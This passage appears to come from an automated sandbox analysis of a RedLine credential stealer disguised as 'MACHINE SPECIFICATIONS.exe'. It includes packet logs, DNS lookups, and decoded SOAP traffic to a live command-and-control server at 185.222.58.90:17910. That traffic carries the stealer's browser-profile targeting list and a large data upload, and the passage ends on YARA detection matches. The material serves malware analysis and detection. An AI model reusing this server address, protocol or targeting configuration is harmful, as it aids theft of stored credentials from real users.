                                                                                  May 25, 2022 05:55:07.401175976 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401468039 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401588917 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.401640892 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401717901 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.401917934 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401997089 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.423573971 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423693895 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423831940 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.423883915 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423914909 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423984051 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.424000978 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.424146891 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.424381018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.424719095 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.424839020 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425009966 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425095081 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425241947 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425333023 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425477028 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425563097 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425708055 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425770044 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.427211046 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.427706003 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.427803993 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.427977085 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428071976 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.428289890 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428380966 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.428504944 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428615093 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.428740025 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428968906 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.429090977 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.450289011 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450342894 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450547934 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.450579882 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450810909 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450939894 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.451131105 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451323032 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451565981 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451690912 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.451894045 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451970100 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.452008009 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.452091932 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.452158928 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.452245951 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.452388048 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.452467918 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.453948975 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.454157114 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.454272985 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.454473019 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.454687119 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.455005884 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.455204964 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.455487967 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460839033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460870028 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460895061 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460922003 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460948944 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460973978 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.476948023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477163076 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477402925 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477428913 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477888107 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478163004 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478442907 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478645086 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478921890 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.479202032 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.479481936 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.480407953 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.480628967 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489039898 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489068031 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489087105 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489104033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.514468908 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.610975027 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.870074987 CEST4975017910192.168.2.3185.222.58.90
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 25, 2022 05:54:43.152170897 CEST5122953192.168.2.38.8.8.8
                                                                                  May 25, 2022 05:54:43.197985888 CEST6485153192.168.2.38.8.8.8
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  May 25, 2022 05:54:43.152170897 CEST192.168.2.38.8.8.80xee6bStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                  May 25, 2022 05:54:43.197985888 CEST192.168.2.38.8.8.80xac5cStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  May 25, 2022 05:54:43.178622961 CEST8.8.8.8192.168.2.30xee6bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                  May 25, 2022 05:54:43.224001884 CEST8.8.8.8192.168.2.30xac5cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                  • 185.222.58.90:17910
                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.349739185.222.58.9017910C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 25, 2022 05:54:35.038233042 CEST1143OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 137
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Connection: Keep-Alive
                                                                                  May 25, 2022 05:54:35.386113882 CEST1143INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:54:35.616060972 CEST1144INHTTP/1.1 200 OK
                                                                                  Content-Length: 212
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:54:35 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                  May 25, 2022 05:54:42.240025043 CEST1217OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 144
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  May 25, 2022 05:54:42.592434883 CEST1217INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:54:42.723193884 CEST1218INHTTP/1.1 200 OK
                                                                                  Content-Length: 4744
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:54:42 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.349750185.222.58.9017910C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 25, 2022 05:55:06.701167107 CEST1250OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 1133614
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  May 25, 2022 05:55:06.728950977 CEST1250INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:55:07.136980057 CEST2441INHTTP/1.1 200 OK
                                                                                  Content-Length: 147
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:55:06 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                  May 25, 2022 05:55:07.140512943 CEST2441OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 1133606
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  May 25, 2022 05:55:07.180166006 CEST2441INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:55:07.514468908 CEST3598INHTTP/1.1 200 OK
                                                                                  Content-Length: 261
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:55:06 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:05:54:10
                                                                                  Start date:25/05/2022
                                                                                  Path:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
                                                                                  Imagebase:0xf80000
                                                                                  File size:1190912 bytes
                                                                                  MD5 hash:6A54566BF72BC5F07BAC04C982DAB3E6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  Target ID:1
                                                                                  Start time:05:54:16
                                                                                  Start date:25/05/2022
                                                                                  Path:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  Imagebase:0xf80000
                                                                                  File size:1190912 bytes
                                                                                  MD5 hash:6A54566BF72BC5F07BAC04C982DAB3E6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecu